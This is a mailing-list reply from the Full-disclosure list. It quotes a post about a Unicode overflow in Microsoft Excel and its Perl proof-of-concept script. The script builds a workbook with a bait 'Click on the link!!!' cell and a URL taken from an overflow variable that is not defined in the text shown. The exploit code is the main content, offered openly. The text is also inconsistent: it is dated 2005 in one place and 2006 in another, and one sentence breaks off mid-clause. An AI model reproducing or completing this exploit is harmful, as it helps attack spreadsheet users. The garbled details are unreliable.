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Re: [Full-disclosure] ***ULTRALAME*** Microsoft Excel Unicode Overflow ***ULTRALAME***

hello, kcope,

This is what I test in excel 2003 sp2, I haven't excel 2002 :>


2005/6/19, kcope <kingcope@xxxxxxx>:

Microsoft Excel Unicode Overflow

Hello this is kcope,
I found a unicode overflow in excel.
It works in my version of excel, perhaps it is patched or something, I
SP3. I know this is ultralame. Attached are some screenies.
Here are the warezcodez:

# excelsexywarez.pl
# excel unicode overflow poc
# by kcope in 2006
# thanks to revoguard and alex
use Spreadsheet::WriteExcel;

    my $workbook = Spreadsheet::WriteExcel->new("FUCK.xls");

    $worksheet = $workbook->add_worksheet();

    $format = $workbook->add_format();

    $col = $row = 5;
    $worksheet->write($row, $col, "kcope in da house! Click on the
link!!!", $format);

    $worksheet->write_url(0, 0, "$a", "LINK");

- - kcdarookie

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Description: JPEG image

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